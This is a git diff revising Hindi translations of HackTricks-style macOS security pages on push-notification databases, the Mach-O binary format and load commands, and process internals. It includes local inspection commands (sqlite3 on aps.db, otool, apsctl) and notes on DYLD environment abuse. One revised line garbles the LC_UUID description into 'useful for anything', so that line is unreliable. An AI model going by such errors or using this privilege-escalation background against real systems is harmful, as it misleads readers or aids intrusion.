@ -224,7 +224,7 @@ macOS में संदेशों का एक स्थानीय डे
```bash
sudo sqlite3 /Library/Application\ Support/ApplePushService/aps.db
```
यह भी संभव है कि आप डेमन और कनेक्शनों के बारे में जानकारी प्राप्त करें:
यह भी संभव है कि आप डेमन और कनेक्शनों के बारे में जानकारी प्राप्त कर सकें:
```bash
/System/Library/PrivateFrameworks/ApplePushService.framework/apsctl status
```
@ -234,6 +234,6 @@ sudo sqlite3 /Library/Application\ Support/ApplePushService/aps.db
- **`CFUserNotification`**: ये API स्क्रीन पर एक संदेश के साथ पॉप-अप दिखाने का एक तरीका प्रदान करती है।
- **बुलेटिन बोर्ड**: यह iOS में एक बैनर दिखाता है जो गायब हो जाता है और सूचना केंद्र में संग्रहीत किया जाएगा।
- **`NSUserNotificationCenter`**: यह MacOS में iOS बुलेटिन बोर्ड है। सूचनाओं के साथ डेटाबेस `/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db` में स्थित है।
- **`NSUserNotificationCenter`**: यह MacOS में iOS का बुलेटिन बोर्ड है। सूचनाओं के साथ डेटाबेस `/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db` में स्थित है।
{{#include ../../../banners/hacktricks-training.md}}

44
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
View File

@ -27,8 +27,8 @@ struct fat_header {
</strong>};
struct fat_arch {
cpu_type_t cputype; /* cpu निर्दिष्टकर्ता (int) */
cpu_subtype_t cpusubtype; /* मशीन निर्दिष्टकर्ता (int) */
cpu_type_t cputype; /* cpu निर्दिष्ट करने वाला (int) */
cpu_subtype_t cpusubtype; /* मशीन निर्दिष्ट करने वाला (int) */
uint32_t offset; /* इस ऑब्जेक्ट फ़ाइल के लिए फ़ाइल ऑफ़सेट */
uint32_t size; /* इस ऑब्जेक्ट फ़ाइल का आकार */
uint32_t align; /* 2 की शक्ति के रूप में संरेखण */
@ -72,7 +72,7 @@ capabilities PTR_AUTH_VERSION USERSPACE 0
## **Mach-O हेडर**
हेडर फ़ाइल के बारे में बुनियादी जानकारी प्रदान करता है, जैसे इसे Mach-O फ़ाइल के रूप में पहचानने के लिए जादुई बाइट्स और लक्षित आर्किटेक्चर के बारे में जानकारी। आप इसे खोज सकते हैं: `mdfind loader.h | grep -i mach-o | grep -E "loader.h$"`
हेडर फ़ाइल के बारे में बुनियादी जानकारी प्रदान करता है, जैसे कि इसे Mach-O फ़ाइल के रूप में पहचानने के लिए जादुई बाइट्स और लक्षित आर्किटेक्चर के बारे में जानकारी। आप इसे यहाँ पा सकते हैं: `mdfind loader.h | grep -i mach-o | grep -E "loader.h$"`
```c
#define MH_MAGIC 0xfeedface /* the mach magic number */
#define MH_CIGAM 0xcefaedfe /* NXSwapInt(MH_MAGIC) */
@ -103,9 +103,9 @@ uint32_t reserved; /* reserved */
विभिन्न फ़ाइल प्रकार हैं, जिन्हें आप [**स्रोत कोड में उदाहरण के लिए यहाँ**](https://opensource.apple.com/source/xnu/xnu-2050.18.24/EXTERNAL_HEADERS/mach-o/loader.h) पर परिभाषित कर सकते हैं। सबसे महत्वपूर्ण हैं:
- `MH_OBJECT`: पुनर्स्थापनीय ऑब्जेक्ट फ़ाइल (संकलन के मध्य उत्पाद, अभी निष्पादन योग्य नहीं)।
- `MH_OBJECT`: पुनर्स्थापनीय ऑब्जेक्ट फ़ाइल (संकलन के मध्यवर्ती उत्पाद, अभी निष्पादन योग्य नहीं)।
- `MH_EXECUTE`: निष्पादन योग्य फ़ाइलें।
- `MH_FVMLIB`: स्थिर VM पुस्तकालय फ़ाइल।
- `MH_FVMLIB`: निश्चित VM पुस्तकालय फ़ाइल।
- `MH_CORE`: कोड डंप
- `MH_PRELOAD`: प्रीलोडेड निष्पादन योग्य फ़ाइल (XNU में अब समर्थित नहीं)
- `MH_DYLIB`: गतिशील पुस्तकालय
@ -126,7 +126,7 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY
## **Mach-O फ्लैग्स**
स्रोत कोड कई फ्लैग्स को परिभाषित करता है जो पुस्तकालयों को लोड करने के लिए उपयोगी होते हैं:
स्रोत कोड कई फ्लैग्स को परिभाषित करता है जो लाइब्रेरी लोड करने के लिए उपयोगी होते हैं:
- `MH_NOUNDEFS`: कोई अपरिभाषित संदर्भ नहीं (पूर्ण रूप से लिंक किया गया)
- `MH_DYLDLINK`: Dyld लिंकिंग
@ -135,17 +135,17 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY
- `MH_WEAK_DEFINES`: बाइनरी में कमजोर परिभाषित प्रतीक हैं
- `MH_BINDS_TO_WEAK`: बाइनरी कमजोर प्रतीकों का उपयोग करती है
- `MH_ALLOW_STACK_EXECUTION`: स्टैक को निष्पादित करने योग्य बनाएं
- `MH_NO_REEXPORTED_DYLIBS`: पुस्तकालय LC_REEXPORT कमांड नहीं है
- `MH_NO_REEXPORTED_DYLIBS`: लाइब्रेरी में LC_REEXPORT कमांड नहीं हैं
- `MH_PIE`: स्थिति स्वतंत्र निष्पादन योग्य
- `MH_HAS_TLV_DESCRIPTORS`: वहाँ एक अनुभाग है जिसमें थ्रेड स्थानीय चर हैं
- `MH_NO_HEAP_EXECUTION`: हीप/डेटा पृष्ठों के लिए कोई निष्पादन नहीं
- `MH_HAS_OBJC`: बाइनरी में oBject-C अनुभाग हैं
- `MH_SIM_SUPPORT`: सिम्युलेटर समर्थन
- `MH_DYLIB_IN_CACHE`: साझा पुस्तकालय कैश में dylibs/फ्रेमवर्क पर उपयोग किया गया।
- `MH_DYLIB_IN_CACHE`: साझा लाइब्रेरी कैश में dylibs/फ्रेमवर्क पर उपयोग किया गया।
## **Mach-O लोड कमांड्स**
**फाइल का लेआउट मेमोरी** में यहाँ निर्दिष्ट किया गया है, जिसमें **प्रतीक तालिका का स्थान**, निष्पादन प्रारंभ पर मुख्य थ्रेड का संदर्भ, और आवश्यक **साझा पुस्तकालयें** शामिल हैं। गतिशील लोडर **(dyld)** को बाइनरी के मेमोरी में लोडिंग प्रक्रिया के लिए निर्देश दिए जाते हैं।
**फाइल का लेआउट मेमोरी में** यहाँ निर्दिष्ट किया गया है, जिसमें **प्रतीक तालिका का स्थान**, निष्पादन प्रारंभ पर मुख्य थ्रेड का संदर्भ, और आवश्यक **साझा लाइब्रेरी** का विवरण है। गतिशील लोडर **(dyld)** को बाइनरी के मेमोरी में लोडिंग प्रक्रिया के लिए निर्देश दिए जाते हैं।
यह **load_command** संरचना का उपयोग करता है, जिसे उल्लेखित **`loader.h`** में परिभाषित किया गया है:
```objectivec
@ -159,15 +159,15 @@ There are about **50 different types of load commands** that the system handles
### **LC_SEGMENT/LC_SEGMENT_64**
> [!TIP]
> मूल रूप से, इस प्रकार क लोड कमांड **कैसे \_\_TEXT** (कार्यकारी कोड) **और \_\_DATA** (प्रक्रिया के लिए डेटा) **सेगमेंट को लोड करना है** यह परिभाषित करते हैं, **डेटा अनुभाग में निर्दिष्ट ऑफ़सेट के अनुसार** जब बाइनरी निष्पादित होती है
> मूल रूप से, इस प्रकार क लोड कमांड **कैसे \_\_TEXT** (कार्यकारी कोड) **और \_\_DATA** (प्रक्रिया के लिए डेटा) **सेगमेंट को लोड करना है** यह परिभाषित करता है **जो डेटा अनुभाग में निर्दिष्ट ऑफसेट के अनुसार** बाइनरी के निष्पादन के समय
ये कमांड **सेगमेंट को परिभाषित करते हैं** जो **प्रक्रिया के निष्पादन के समय** इसके **आभासी मेमोरी स्थान** में **मैप** होते हैं।
ये कमांड **सेगमेंट को परिभाषित करते हैं** जो **प्रक्रिया के निष्पादन के समय** के **वर्चुअल मेमोरी स्पेस** में **मैप** होते हैं।
सेगमेंट के **विभिन्न प्रकार** होते हैं, जैसे कि **\_\_TEXT** सेगमेंट, जो एक प्रोग्राम के कार्यकारी कोड को रखता है, और **\_\_DATA** सेगमेंट, जो प्रक्रिया द्वारा उपयोग किए जाने वाले डेटा को शामिल करता है। ये **सेगमेंट Mach-O फ़ाइल के डेटा अनुभाग में स्थित होते हैं**
**प्रत्येक सेगमेंट** को आगे **कई अनुभागों** में **विभाजित** किया जा सकता है। **लोड कमांड संरचना** में **इन अनुभागों** के बारे में **जानकारी** होती है जो संबंधित सेगमेंट के भीतर होती है।
हेडर में सबसे पहले आप **सेगमेंट हेडर** पाते हैं:
हेडर में पहले आपको **सेगमेंट हेडर** मिलता है:
<pre class="language-c"><code class="lang-c">struct segment_command_64 { /* for 64-bit architectures */
uint32_t cmd; /* LC_SEGMENT_64 */
@ -209,7 +209,7 @@ uint32_t reserved3; /* reserved */
<figure><img src="../../../images/image (1108).png" alt=""><figcaption></figcaption></figure>
यदि आप **अनुभाग ऑफसेट** (0x37DC) + **ऑफसेट** जहां **आर्क शुरू होता है**, इस मामले में `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
यदि आप **अनुभाग ऑफसेट** (0x37DC) + **ऑफसेट** जहां **आर्क शुरू होता है**, इस मामले में `0x18000` जोड़ते हैं --> `0x37DC + 0x18000 = 0x1B7DC`
<figure><img src="../../../images/image (701).png" alt=""><figcaption></figcaption></figure>
@ -219,7 +219,7 @@ otool -lv /bin/ls
```
सामान्य खंड जो इस cmd द्वारा लोड होते हैं:
- **`__PAGEZERO`:** यह कर्नेल को **मैप** करने के लिए निर्देशित करता है **पता शून्य** ताकि इसे **पढ़ा, लिखा या निष्पादित** नहीं किया जा सके। संरचना में maxprot और minprot वेरिएबल को शून्य पर सेट किया गया है ताकि यह संकेत दिया जा सके कि इस पृष्ठ पर **कोई पढ़ने-लिखने-निष्पादन अधिकार नहीं हैं**
- **`__PAGEZERO`:** यह कर्नेल को **निर्देश** देता है कि **पता शून्य** को **मैप** करें ताकि इसे **पढ़ा, लिखा या निष्पादित** नहीं किया जा सके। संरचना में maxprot और minprot वेरिएबल को शून्य पर सेट किया गया है ताकि यह संकेत दिया जा सके कि इस पृष्ठ पर **कोई पढ़ने-लिखने-निष्पादन अधिकार नहीं हैं**
- यह आवंटन **NULL पॉइंटर डेरिफरेंस कमजोरियों** को **कम करने** के लिए महत्वपूर्ण है। इसका कारण यह है कि XNU एक कठोर पृष्ठ शून्य को लागू करता है जो सुनिश्चित करता है कि मेमोरी का पहला पृष्ठ (केवल पहला) अनुपलब्ध है (i386 को छोड़कर)। एक बाइनरी इस आवश्यकताओं को पूरा कर सकती है एक छोटे \_\_PAGEZERO ( `-pagezero_size` का उपयोग करके) को तैयार करके जो पहले 4k को कवर करता है और शेष 32-बिट मेमोरी को उपयोगकर्ता और कर्नेल मोड दोनों में सुलभ बनाता है।
- **`__TEXT`**: इसमें **निष्पादन योग्य** **कोड** होता है जिसमें **पढ़ने** और **निष्पादन** की अनुमति होती है (कोई लिखने योग्य नहीं)**।** इस खंड के सामान्य अनुभाग:
- `__text`: संकलित बाइनरी कोड
@ -236,8 +236,8 @@ otool -lv /bin/ls
- `__cfstring`: कोरफाउंडेशन स्ट्रिंग
- `__data`: वैश्विक वेरिएबल (जो प्रारंभिक किया गया है)
- `__bss`: स्थिर वेरिएबल (जो प्रारंभिक नहीं किया गया है)
- `__objc_*` (\_\_objc_classlist, \_\_objc_protolist, आदि): जानकारी जो ऑब्जेक्टिव-सी रनटाइम द्वारा उपयोग की जाती है
- **`__DATA_CONST`**: \_\_DATA.\_\_const को स्थायी होने की गारंटी नहीं है (लिखने की अनुमति), न ही अन्य पॉइंटर्स और GOT। यह अनुभाग `__const`, कुछ प्रारंभिककरणकर्ताओं और GOT तालिका (एक बार हल होने पर) को **केवल पढ़ने योग्य** बनाता है `mprotect` का उपयोग करके।
- `__objc_*` (\_\_objc_classlist, \_\_objc_protolist, आदि): जानकारी जो ऑब्जेक्टिव-C रनटाइम द्वारा उपयोग की जाती है
- **`__DATA_CONST`**: \_\_DATA.\_\_const को स्थायी होने की गारंटी नहीं है (लिखने की अनुमति), न ही अन्य पॉइंटर्स और GOT। यह अनुभाग `__const`, कुछ प्रारंभिक और GOT तालिका (एक बार हल होने पर) को **केवल पढ़ने योग्य** बनाता है `mprotect` का उपयोग करके।
- **`__LINKEDIT`**: इसमें लिंकर्स (dyld) के लिए जानकारी होती है जैसे, प्रतीक, स्ट्रिंग, और पुनर्स्थापन तालिका प्रविष्टियाँ। यह `__TEXT` या `__DATA` में न होने वाली सामग्री के लिए एक सामान्य कंटेनर है और इसकी सामग्री अन्य लोड कमांड में वर्णित है।
- dyld जानकारी: रीबेस, गैर-आलसी/आलसी/कमजोर बाइंडिंग ऑपकोड और निर्यात जानकारी
- फ़ंक्शंस प्रारंभ: फ़ंक्शंस के प्रारंभ पते की तालिका
@ -246,7 +246,7 @@ otool -lv /bin/ls
- अप्रत्यक्ष प्रतीक तालिका: पॉइंटर/स्टब प्रतीक
- स्ट्रिंग तालिका
- कोड सिग्नेचर
- **`__OBJC`**: इसमें ऑब्जेक्टिव-सी रनटाइम द्वारा उपयोग की जाने वाली जानकारी होती है। हालांकि यह जानकारी \_\_DATA खंड में भी पाई जा सकती है, विभिन्न \_\_objc\_\* अनुभागों के भीतर।
- **`__OBJC`**: इसमें ऑब्जेक्टिव-C रनटाइम द्वारा उपयोग की जाने वाली जानकारी होती है। हालांकि यह जानकारी \_\_DATA खंड में भी पाई जा सकती है, विभिन्न \_\_objc\_\* अनुभागों के भीतर।
- **`__RESTRICT`**: एक ऐसा खंड जिसमें सामग्री नहीं होती है जिसमें एकल अनुभाग होता है जिसे **`__restrict`** (भी खाली) कहा जाता है जो सुनिश्चित करता है कि बाइनरी चलाते समय, यह DYLD पर्यावरणीय चर को अनदेखा करेगा।
जैसा कि कोड में देखा जा सकता है, **खंड भी फ़्लैग का समर्थन करते हैं** (हालांकि उनका बहुत अधिक उपयोग नहीं किया जाता):
@ -260,7 +260,7 @@ otool -lv /bin/ls
**`LC_MAIN`** में **entryoff विशेषता** में प्रवेश बिंदु होता है। लोड समय पर, **dyld** बस इस मान को (मेमोरी में) **बाइनरी के आधार** में **जोड़ता** है, फिर **इस निर्देश पर कूदता** है ताकि बाइनरी के कोड का निष्पादन शुरू हो सके।
**`LC_UNIXTHREAD`** में वे मान होते हैं जो रजिस्टर को मुख्य धागा शुरू करते समय होना चाहिए। इसे पहले ही अमान्य कर दिया गया था लेकिन **`dyld`** अभी भी इसका उपयोग करता है। इस द्वारा सेट किए गए रजिस्टर के मानों को देखन संभव है:
**`LC_UNIXTHREAD`** में वे मान होते हैं जो रजिस्टर को मुख्य धागा शुरू करते समय होना चाहिए। इसे पहले ही अमान्य कर दिया गया था लेकिन **`dyld`** अभी भी इसका उपयोग करता है। इसे सेट किए गए रजिस्टर के मानों को देखने के लिए संभव है:
```bash
otool -l /usr/lib/dyld
[...]
@ -286,7 +286,7 @@ cpsr 0x00000000
```
### **`LC_CODE_SIGNATURE`**
यह **Macho-O फ़ाइल** के **कोड सिग्नेचर** के बारे में जानकारी रखता है। इसमें केवल एक **ऑफसेट** होता है जो **सिग्नेचर ब्लॉब** की ओर **संकेत** करता है। यह आमतौर पर फ़ाइल के अंत में होता है।\
यह **Macho-O फ़ाइल** के **कोड हस्ताक्षर** के बारे में जानकारी रखता है। इसमें केवल एक **ऑफसेट** होता है जो **हस्ताक्षर ब्लॉब** की ओर **संकेत** करता है। यह आमतौर पर फ़ाइल के अंत में होता है।\
हालांकि, आप इस अनुभाग के बारे में कुछ जानकारी [**इस ब्लॉग पोस्ट**](https://davedelong.com/blog/2018/01/10/reading-your-own-entitlements/) और इस [**gists**](https://gist.github.com/carlospolop/ef26f8eb9fafd4bc22e69e1a32b81da4) में पा सकते हैं।
### **`LC_ENCRYPTION_INFO[_64]`**
@ -303,17 +303,17 @@ cpsr 0x00000000
### **`LC_UUID`**
यादृच्छिक UUID। यह किसी भी चीज़ के लिए सीधे उपयोगी नहीं है लेकिन XNU इसे प्रक्रिया की बाकी जानकारी के साथ कैश करता है। इसका उपयोग क्रैश रिपोर्ट में किया जा सकता है।
यादृच्छिक UUID। यह किसी भी चीज़ के लिए उपयोगी है लेकिन XNU इसे प्रक्रिया की अन्य जानकारी के साथ कैश करता है। इसका उपयोग क्रैश रिपोर्ट में किया जा सकता है।
### **`LC_DYLD_ENVIRONMENT`**
प्रक्रिया के निष्पादन से पहले dyld को पर्यावरण चर निर्दिष्ट करने की अनुमति देता है। यह बहुत खतरनाक हो सकता है क्योंकि यह प्रक्रिया के अंदर मनमाना कोड निष्पादित करने की अनुमति दे सकता है, इसलिए यह लोड कमांड केवल `#define SUPPORT_LC_DYLD_ENVIRONMENT` के साथ dyld निर्माण में उपयोग किया जाता है और केवल `DYLD_..._PATH` के रूप के चर को लोड पथ निर्दिष्ट करने के लिए आगे संसाधित करता है।
प्रक्रिया के निष्पादन से पहले dyld को पर्यावरण चर निर्दिष्ट करने की अनुमति देता है। यह बहुत खतरनाक हो सकता है क्योंकि यह प्रक्रिया के अंदर मनमाना कोड निष्पादित करने की अनुमति दे सकता है, इसलिए यह लोड कमांड केवल `#define SUPPORT_LC_DYLD_ENVIRONMENT` के साथ dyld निर्माण में उपयोग किया जाता है और केवल `DYLD_..._PATH` के रूप के चर को लोड पथ निर्दिष्ट करने के लिए आगे संसाधित करने की अनुमति देता है।
### **`LC_LOAD_DYLIB`**
यह लोड कमांड एक **डायनामिक** **लाइब्रेरी** निर्भरता का वर्णन करता है जो **लोडर** (dyld) को **कहा गया लाइब्रेरी लोड और लिंक करने** के लिए **निर्देश** देता है। Mach-O बाइनरी के लिए आवश्यक **प्रत्येक लाइब्रेरी** के लिए एक `LC_LOAD_DYLIB` लोड कमांड है।
- यह लोड कमांड **`dylib_command`** प्रकार की संरचना है (जिसमें एक स्ट्रक्चर dylib होता है, जो वास्तविक निर्भर डायनामिक लाइब्रेरी का वर्णन करता है):
- यह लोड कमांड **`dylib_command`** प्रकार की संरचना है (जिसमें एक स्ट्रक्चर dylib होता है, जो वास्तविक निर्भरता डायनामिक लाइब्रेरी का वर्णन करता है):
```objectivec
struct dylib_command {
uint32_t cmd; /* LC_LOAD_{,WEAK_}DYLIB */

38
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
View File

@ -6,14 +6,14 @@
एक प्रक्रिया एक चल रहे निष्पादन का उदाहरण है, हालाँकि प्रक्रियाएँ कोड नहीं चलाती हैं, ये थ्रेड हैं। इसलिए **प्रक्रियाएँ केवल चल रहे थ्रेड्स के लिए कंटेनर हैं** जो मेमोरी, डिस्क्रिप्टर्स, पोर्ट्स, अनुमतियाँ प्रदान करती हैं...
परंपरागत रूप से, प्रक्रियाएँ अन्य प्रक्रियाओं के भीतर शुरू की जाती थीं (PID 1 को छोड़कर) **`fork`** को कॉल करके, जो वर्तमान प्रक्रिया की एक सटीक प्रति बनाएगी और फिर **बच्चा प्रक्रिया** सामान्यतः **`execve`** को कॉल करेगी ताकि नए निष्पादन को लोड किया जा सके और इसे चलाया जा सके। फिर, **`vfork`** को पेश किया गया ताकि इस प्रक्रिया को बिना किसी मेमोरी कॉपी के तेज़ बनाया जा सके।\
परंपरागत रूप से, प्रक्रियाएँ अन्य प्रक्रियाओं के भीतर शुरू की जाती थीं (PID 1 को छोड़कर) **`fork`** को कॉल करके, जो वर्तमान प्रक्रिया की एक सटीक प्रति बनाएगा और फिर **बच्ची प्रक्रिया** सामान्यतः **`execve`** को कॉल करेगी ताकि नए निष्पादन को लोड किया जा सके और इसे चलाया जा सके। फिर, **`vfork`** को पेश किया गया ताकि इस प्रक्रिया को बिना किसी मेमोरी कॉपी के तेज़ बनाया जा सके।\
फिर **`posix_spawn`** को पेश किया गया जो **`vfork`** और **`execve`** को एक कॉल में संयोजित करता है और फ्लैग स्वीकार करता है:
- `POSIX_SPAWN_RESETIDS`: प्रभावी आईडी को वास्तविक आईडी पर रीसेट करें
- `POSIX_SPAWN_SETPGROUP`: प्रक्रिया समूह संबंध सेट करें
- `POSUX_SPAWN_SETSIGDEF`: सिग्नल डिफ़ॉल्ट व्यवहार सेट करें
- `POSIX_SPAWN_SETSIGMASK`: सिग्नल मास्क सेट करें
- `POSIX_SPAWN_SETEXEC`: उसी प्रक्रिया में Exec (जैसे `execve` अधिक विकल्पों के साथ)
- `POSIX_SPAWN_SETEXEC`: उसी प्रक्रिया में Exec करें (जैसे `execve` अधिक विकल्पों के साथ)
- `POSIX_SPAWN_START_SUSPENDED`: निलंबित शुरू करें
- `_POSIX_SPAWN_DISABLE_ASLR`: ASLR के बिना शुरू करें
- `_POSIX_SPAWN_NANO_ALLOCATOR:` libmalloc के नैनो आवंटक का उपयोग करें
@ -23,7 +23,7 @@
इसके अलावा, `posix_spawn` एक **`posix_spawnattr`** के एक ऐरे को निर्दिष्ट करने की अनुमति देता है जो उत्पन्न प्रक्रिया के कुछ पहलुओं को नियंत्रित करता है, और **`posix_spawn_file_actions`** को डिस्क्रिप्टर्स की स्थिति को संशोधित करने के लिए।
जब एक प्रक्रिया मरती है, तो यह **माता-पिता प्रक्रिया को लौटने का कोड भेजती है** (यदि माता-पिता मर गया, तो नया माता-पिता PID 1 है) सिग्नल `SIGCHLD` के साथ। माता-पिता को इस मान को प्राप्त करने की आवश्यकता होती है `wait4()` या `waitid()` को कॉल करके और जब तक ऐसा नहीं होता, बच्चा एक ज़ोंबी स्थिति में रहता है जहाँ यह अभी भी सूचीबद्ध है लेकिन संसाधनों का उपभोग नहीं करता है।
जब एक प्रक्रिया मरती है, तो यह **माता-पिता प्रक्रिया को लौटने का कोड भेजती है** (यदि माता-पिता मर गया, तो नया माता-पिता PID 1 है) सिग्नल `SIGCHLD` के साथ। माता-पिता को इस मान को प्राप्त करने के लिए `wait4()` या `waitid()` कॉल करना होगा और जब तक ऐसा नहीं होता, बच्चा एक ज़ोंबी स्थिति में रहता है जहाँ यह अभी भी सूचीबद्ध है लेकिन संसाधनों का उपभोग नहीं करता है।
### PIDs
@ -31,18 +31,18 @@ PIDs, प्रक्रिया पहचानकर्ता, एक अद
### Process Groups, Sessions & Coalations
**प्रक्रियाएँ** को **समूहों** में डाला जा सकता है ताकि उन्हें संभालना आसान हो सके। उदाहरण के लिए, एक शेल स्क्रिप्ट में कमांड एक ही प्रक्रिया समूह में होंगे ताकि उन्हें एक साथ **सिग्नल किया जा सके** जैसे कि kill का उपयोग करके।\
यह भी संभव है कि **प्रक्रियाओं को सत्रों में समूहित किया जाए**। जब एक प्रक्रिया एक सत्र शुरू करती है (`setsid(2)`), तो बच्चों की प्रक्रियाएँ सत्र के भीतर सेट की जाती हैं, जब तक कि वे अपना खुद का सत्र शुरू न करें।
**प्रक्रियाएँ** को **समूहों** में डाला जा सकता है ताकि उन्हें संभालना आसान हो सके। उदाहरण के लिए, एक शेल स्क्रिप्ट में कमांड एक ही प्रक्रिया समूह में होंगे ताकि उन्हें एक साथ **सिग्नल किया जा सके** जैसे कि किल का उपयोग करके।\
यह भी संभव है कि **प्रक्रियाओं को सत्रों में समूहित किया जाए**। जब एक प्रक्रिया एक सत्र शुरू करती है (`setsid(2)`), तो बच्चों की प्रक्रियाएँ सत्र के भीतर सेट की जाती हैं, जब तक कि वे अपना स्वयं का सत्र शुरू न करें।
Coalition एक और तरीका है प्रक्रियाओं को Darwin में समूहित करने का। एक प्रक्रिया एक कोलैशन में शामिल होने से उसे पूल संसाधनों तक पहुँचने की अनुमति मिलती है, एक लेजर साझा करने या Jetsam का सामना करने की। कोलैशन्स के विभिन्न भूमिकाएँ होती हैं: नेता, XPC सेवा, एक्सटेंशन।
Coalition एक और तरीका है प्रक्रियाओं को डार्विन में समूहित करने का। एक प्रक्रिया एक कोलैशन में शामिल होने से उसे पूल संसाधनों तक पहुँचने की अनुमति मिलती है, एक लेजर साझा करना या Jetsam का सामना करना। कोलैशनों के विभिन्न भूमिकाएँ होती हैं: नेता, XPC सेवा, एक्सटेंशन।
### Credentials & Personae
प्रत्येक प्रक्रिया **क्रेडेंशियल्स** रखती है जो **इसके विशेषाधिकारों की पहचान करती है** प्रणाली में। प्रत्येक प्रक्रिया का एक प्राथमिक `uid` और एक प्राथमिक `gid` होगा (हालाकि यह कई समूहों से संबंधित हो सकता है)।\
प्रत्येक प्रक्रिया **प्रमाणपत्र** रखती है जो **इसके विशेषाधिकारों की पहचान करती है** प्रणाली में। प्रत्येक प्रक्रिया का एक प्राथमिक `uid` और एक प्राथमिक `gid` होगा (हालाकि यह कई समूहों से संबंधित हो सकता है)।\
यदि बाइनरी में `setuid/setgid` बिट है तो उपयोगकर्ता और समूह आईडी को बदलना भी संभव है।\
**नए uids/gids सेट करने** के लिए कई फ़ंक्शन हैं।
नए uids/gids सेट करने के लिए कई फ़ंक्शन हैं।
सिस्टम कॉल **`persona`** एक **वैकल्पिक** सेट प्रदान करता है **क्रेडेंशियल्स** का। एक व्यक्ति को अपनाने से इसके uid, gid और समूह सदस्यता **एक साथ** मान ली जाती है। [**स्रोत कोड**](https://github.com/apple/darwin-xnu/blob/main/bsd/sys/persona.h) में संरचना पाई जा सकती है:
syscall **`persona`** एक **वैकल्पिक** सेट प्रदान करता है **प्रमाणपत्रों** का। एक व्यक्तित्व को अपनाने से इसके uid, gid और समूह सदस्यता **एक साथ** मान ली जाती है। [**स्रोत कोड**](https://github.com/apple/darwin-xnu/blob/main/bsd/sys/persona.h) में संरचना पाई जा सकती है:
```c
struct kpersona_info { uint32_t persona_info_version;
uid_t persona_id; /* overlaps with UID */
@ -79,7 +79,7 @@ char persona_name[MAXLOGNAME + 1];
- कुछ स्थितियों के होने की प्रतीक्षा के लिए उपयोग किया जाता है, जिसका आकार 44 बाइट है (40 बाइट प्लस 4-बाइट सिग्नेचर)।
- **कंडीशन वेरिएबल गुण (सिग्नेचर: 0x434e4441):** कंडीशन वेरिएबल्स के लिए कॉन्फ़िगरेशन गुण, आकार में 12 बाइट।
3. **एक बार वेरिएबल (सिग्नेचर: 0x4f4e4345):**
- सुनिश्चित करता है कि एक टुकड़ा प्रारंभिककरण को केवल एक बार निष्पादित किया जाए। इसका आकार 12 बाइट है।
- सुनिश्चित करता है कि एक टुकड़ा प्रारंभिककरण को केवल एक बार निष्पादित किया जाए। इसका आकार 12 बाइट है।
4. **रीड-राइट लॉक:**
- एक समय में कई पाठकों या एक लेखक की अनुमति देता है, साझा डेटा तक कुशल पहुँच की सुविधा प्रदान करता है।
- **रीड राइट लॉक (सिग्नेचर: 0x52574c4b):** आकार में 196 बाइट।
@ -105,9 +105,9 @@ tlv_var = 10;
Mach-O बाइनरी में, थ्रेड स्थानीय चर से संबंधित डेटा को विशिष्ट अनुभागों में व्यवस्थित किया गया है:
- **`__DATA.__thread_vars`**: इस अनुभाग में थ्रेड-स्थानीय चर के बारे में मेटाडेटा होता है, जैसे उनके प्रकार और प्रारंभिक स्थिति।
- **`__DATA.__thread_bss`**: इस अनुभाग का उपयोग उन थ्रेड-स्थानीय चर के लिए किया जाता है जो स्पष्ट रूप से प्रारंभ नहीं किए गए हैं। यह शून्य-प्रारंभित डेटा के लिए अलग रखी गई मेमोरी का एक भाग है।
- **`__DATA.__thread_bss`**: इस अनुभाग का उपयोग उन थ्रेड-स्थानीय चर के लिए किया जाता है जो स्पष्ट रूप से प्रारंभ नहीं किए गए हैं। यह शून्य-प्रारंभित डेटा के लिए आरक्षित मेमोरी का एक भाग है।
Mach-O एक विशिष्ट API भी प्रदान करता है जिसे **`tlv_atexit`** कहा जाता है, जो थ्रेड के समाप्त होने पर थ्रेड-स्थानीय चर को प्रबंधित करने के लिए है। यह API आपको **विनाशक पंजीकृत करने** की अनुमति देत है—विशेष कार्य जो थ्रेड समाप्त होने पर थ्रेड-स्थानीय डेटा को साफ करते हैं।
Mach-O एक विशिष्ट API भी प्रदान करता है जिसे **`tlv_atexit`** कहा जाता है, जो थ्रेड के समाप्त होने पर थ्रेड-स्थानीय चर को प्रबंधित करने के लिए है। यह API आपको **विनाशक पंजीकृत करने** की अनुमति देत है—विशेष कार्य जो थ्रेड समाप्त होने पर थ्रेड-स्थानीय डेटा को साफ करते हैं।
### थ्रेडिंग प्राथमिकताएँ
@ -124,7 +124,7 @@ Mach-O एक विशिष्ट API भी प्रदान करता
#### गुणवत्ता सेवा (QoS) वर्ग
QoS वर्ग थ्रेड प्राथमिकताओं को संभालने के लिए एक अधिक आधुनिक दृष्टिकोण है, विशेष रूप से macOS जैसे सिस्टम में जो **ग्रैंड सेंट्रल डिस्पैच (GCD)** का समर्थन करते हैं। QoS वर्ग डेवलपर्स को कार्यों को उनके महत्व या तात्कालिकता के आधार पर विभिन्न स्तरों में **श्रेणीबद्ध** करने की अनुमति देते हैं। macOS इन QoS वर्गों के आधार पर स्वचालित रूप से थ्रेड प्राथमिकता का प्रबंधन करता है:
QoS वर्ग थ्रेड प्राथमिकताओं को संभालने के लिए एक अधिक आधुनिक दृष्टिकोण है, विशेष रूप से macOS जैसे सिस्टम में जो **ग्रैंड सेंट्रल डिस्पैच (GCD)** का समर्थन करते हैं। QoS वर्ग डेवलपर्स को कार्यों को उनके महत्व या तात्कालिकता के आधार पर विभिन्न स्तरों में **श्रेणीबद्ध** करने की अनुमति देते हैं। macOS इन QoS वर्गों के आधार पर स्वचालित रूप से थ्रेड प्राथमिकता प्रबंधित करता है:
1. **उपयोगकर्ता इंटरैक्टिव:**
- यह वर्ग उन कार्यों के लिए है जो वर्तमान में उपयोगकर्ता के साथ इंटरैक्ट कर रहे हैं या अच्छे उपयोगकर्ता अनुभव प्रदान करने के लिए तात्कालिक परिणामों की आवश्यकता होती है। इन कार्यों को इंटरफ़ेस को उत्तरदायी बनाए रखने के लिए उच्चतम प्राथमिकता दी जाती है (जैसे, एनिमेशन या इवेंट हैंडलिंग)।
